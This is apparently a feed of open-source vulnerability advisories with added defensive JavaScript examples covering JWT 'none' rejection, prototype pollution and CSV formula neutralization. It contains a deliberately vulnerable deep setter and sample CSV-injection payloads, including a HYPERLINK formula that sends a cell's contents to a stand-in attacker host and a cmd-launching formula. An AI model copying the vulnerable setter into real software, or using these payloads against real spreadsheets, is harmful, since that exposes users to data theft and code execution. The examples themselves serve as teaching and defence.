A cross-site request forgery (CSRF) vulnerability in Jenkins Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method,…
[org.jenkins-ci.plugins:ssh-agent] Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs
Missing permission checks in Jenkins SSH Agent Plugin 1.23 and earlier allow attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 requires the app…
[org.pac4j:pac4j-core] Pac4j token validation bypass if OpenID Connect provider supports none algorithm
If an OpenID Connect provider supports the “none” algorithm (i.e., tokens with no signature), pac4j v5.3.0 (and prior) does not refuse it without an explicit configuration on its side or for the “idtoken” response type which is not secure and violates …
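The gate pac4j was missing is the one that runs before any signature check: parse the JOSE header, refuse `alg: none` in any casing, require the algorithm to be on an explicit allowlist, and refuse an empty signature segment. Below is an added example of that gate in JavaScript (Node); it is not pac4j's code, the allowlist `ALLOWED_ALGS` and the claims in `claims` are assumptions, and the function stops at the header so it can be run offline without keys.

```javascript
// Added example (not pac4j code): reject unsigned ("alg":"none") ID tokens
// before any signature verification runs. Assumes compact JWS strings.

const ALLOWED_ALGS = new Set(["RS256", "ES256"]); // hypothetical allowlist

function b64urlDecode(s) {
  // base64url -> base64, padding restored
  const b64 = s.replace(/-/g, "+").replace(/_/g, "/");
  const pad = b64.length % 4 === 0 ? "" : "=".repeat(4 - (b64.length % 4));
  return Buffer.from(b64 + pad, "base64").toString("utf8");
}

function b64urlEncode(s) {
  return Buffer.from(s, "utf8").toString("base64")
    .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}

// Returns the parsed header if the token may proceed to signature verification,
// otherwise throws with the reason it was rejected.
function checkIdTokenHeader(token) {
  const parts = token.split(".");
  if (parts.length !== 3) throw new Error("not a compact JWS (expected 3 parts)");
  const [h, , sig] = parts;
  let header;
  try { header = JSON.parse(b64urlDecode(h)); } catch (e) { throw new Error("malformed header"); }
  if (typeof header.alg !== "string") throw new Error("missing alg");
  // "none", "None" and "NONE" all name the unsigned algorithm: compare case-insensitively.
  if (header.alg.toLowerCase() === "none") throw new Error("unsigned token rejected");
  if (!ALLOWED_ALGS.has(header.alg)) throw new Error("alg " + header.alg + " not in allowlist");
  if (sig.length === 0) throw new Error("empty signature");
  return header;
}

function buildToken(header, payload, sig) {
  return b64urlEncode(JSON.stringify(header)) + "." +
         b64urlEncode(JSON.stringify(payload)) + "." + sig;
}

// Constructed claims for the demo tokens (not from any real provider).
const claims = { iss: "https://op.example", sub: "alice", aud: "client-1" };

// Builds a token with the given header and signature segment and reports
// whether the gate lets it through to signature verification.
function tryToken(header, sig) {
  try {
    checkIdTokenHeader(buildToken(header, claims, sig));
    return "accepted";
  } catch (e) {
    return "rejected: " + e.message;
  }
}
```

The algorithm to verify against must come from your own configuration, never from the token header; the allowlist check above is what enforces that, and the `none` check is kept explicit so the rejection reason is visible in logs.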
[numpy] Incorrect Comparison in NumPy
An incomplete string comparison in the numpy.core component of NumPy 1.9.x allows attackers to make the affected APIs fail by constructing specific string objects.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-34141
https://github.com/numpy/numpy/issues/…
[openssl-src] Invalid handling of `X509_verify_cert()` internal errors in libssl
Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return va…
[just-safe-set] Prototype pollution in just-safe-set
Prototype pollution vulnerability in ‘just-safe-set’ versions 1.0.0 through 2.2.1 allows an attacker to cause a denial of service and may lead to remote code execution.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-25952
https://github.com/angu…
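The bug class behind the just-safe-set advisory is a deep "set by path" helper that walks whatever key the caller supplies, so a path beginning with `__proto__` or `constructor.prototype` lands on `Object.prototype` and every object in the process inherits the planted property. The following is an added example in JavaScript, written for this page and not taken from just-safe-set: `unsafeSet` is a hypothetical naive setter, `safeSet` the hardened form, and `pollutes` a harness that checks whether an unrelated object inherited the value and cleans up afterwards.

```javascript
// Added example (not just-safe-set code): a naive deep setter beside a
// hardened one that refuses prototype-walking keys.

// Vulnerable: descends into or creates every path segment, including "__proto__".
function unsafeSet(obj, path, value) {
  const keys = path.split(".");
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    if (cur[keys[i]] === undefined) cur[keys[i]] = {};
    cur = cur[keys[i]];          // "__proto__" resolves to Object.prototype here
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

const FORBIDDEN = new Set(["__proto__", "constructor", "prototype"]);

// Hardened: reject the keys that reach a prototype, and only descend into
// own, plain-object properties rather than anything inherited.
function safeSet(obj, path, value) {
  const keys = path.split(".");
  if (keys.some(k => FORBIDDEN.has(k))) throw new Error("refusing key in path: " + path);
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    if (!Object.prototype.hasOwnProperty.call(cur, k) || typeof cur[k] !== "object" || cur[k] === null) {
      cur[k] = {};
    }
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

// Runs `setter` with an attacker-style path against a throwaway object and
// reports whether a separate, unrelated object inherited the planted value.
// Deletes the property from Object.prototype afterwards so the process is not
// left polluted for later code.
function pollutes(setter, path) {
  const leaf = path.split(".").pop();
  const victim = {};                      // stands in for e.g. a session or options object
  let leaked = false;
  try {
    setter({}, path, true);
    leaked = victim[leaf] === true;       // inherited lookup hits Object.prototype
  } catch (e) {
    leaked = false;                       // safeSet threw: nothing was written
  } finally {
    delete Object.prototype[leaf];
  }
  return leaked;
}
```

The property name in the demo (`isAdmin` in the checks below) is chosen to show why this is more than a denial of service: any later `if (opts.isAdmin)` on an object that never set the field now passes.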
[hexo] XSS in Hexo
Hexo versions 0.0.1 to 5.4.0 are vulnerable to stored XSS. The post “body” and “tags” are not sanitized for malicious JavaScript during web page generation, so a local unprivileged attacker can inject arbitrary code.
References
https://nvd.nist.gov/vuln/deta…
[html-to-csv] Improper Neutralization of Formula Elements in a CSV File in html-to-csv
This affects all versions of package html-to-csv. When there is a formula embedded in an HTML page, it is accepted without any validation and is carried over unchanged when the page is converted into a CSV file. Through this a malicious actor can embed or gen…
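The fix for this class of bug is applied at the point the CSV is written: any cell whose first character would make a spreadsheet evaluate it as a formula gets a leading single quote so it is treated as text, and the field is then quoted per RFC 4180. Below is an added JavaScript example of that neutralization; it is not html-to-csv's code, the trigger set follows the usual CSV-injection guidance (`=`, `+`, `-`, `@`, tab, carriage return), and `scrapedRows` is constructed sample input standing in for a scraped HTML table.

```javascript
// Added example (not html-to-csv code): neutralize formula-looking cells
// before emitting CSV, then quote fields per RFC 4180.

const FORMULA_TRIGGERS = new Set(["=", "+", "-", "@", "\t", "\r"]);
const PLAIN_NUMBER = /^[-+]?\d+(\.\d+)?$/;   // "-5" is data, not a formula

// Neutralize one cell: prefix formula-looking text with a single quote so the
// spreadsheet keeps it as a string, then quote if the field contains a
// delimiter, a quote or a line break.
function csvCell(value) {
  let s = value == null ? "" : String(value);
  if (s.length > 0 && FORMULA_TRIGGERS.has(s[0]) && !PLAIN_NUMBER.test(s)) {
    s = "'" + s;
  }
  if (/[",\r\n]/.test(s)) {
    s = '"' + s.replace(/"/g, '""') + '"';
  }
  return s;
}

// Rows are arrays of cell values; output uses CRLF line endings.
function toCsv(rows) {
  return rows.map(r => r.map(csvCell).join(",")).join("\r\n") + "\r\n";
}

// Constructed input: what a scraper might pull out of an attacker-controlled
// HTML table. The third row is the kind of payload the advisory describes.
const scrapedRows = [
  ["name", "note"],
  ["alice", "hello"],
  ["mallory", '=HYPERLINK("http://attacker.example/?"&A2,"click")'],
  ["bob", "-5"],
];

// Returns the neutralized CSV text for the constructed rows.
function demo() {
  return toCsv(scrapedRows);
}
```

Keep the numeric exemption narrow: a value such as `-5` should stay a number, but `-1+cmd|'/C calc'!A0` starts with `-` and is not a plain number, so it still gets the quote.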
[salt] Exposure of Resource to Wrong Sphere in salt
An issue was discovered in SaltStack Salt before 3003.3. A user who controls the source and source_hash URLs can gain full file system access as root on a salt minion.
References
https://nvd.nist.gov/vuln/detail/CVE-2021-21996
https://lists.deb…
[fruity] Improper Input Validation in fruity
An issue was discovered in the fruity crate through 0.2.0 for Rust. Security-relevant validation of filename extensions is plausibly affected. Methods of NSString for conversion to a string may return a partial result. Because they call CStr::from_ptr …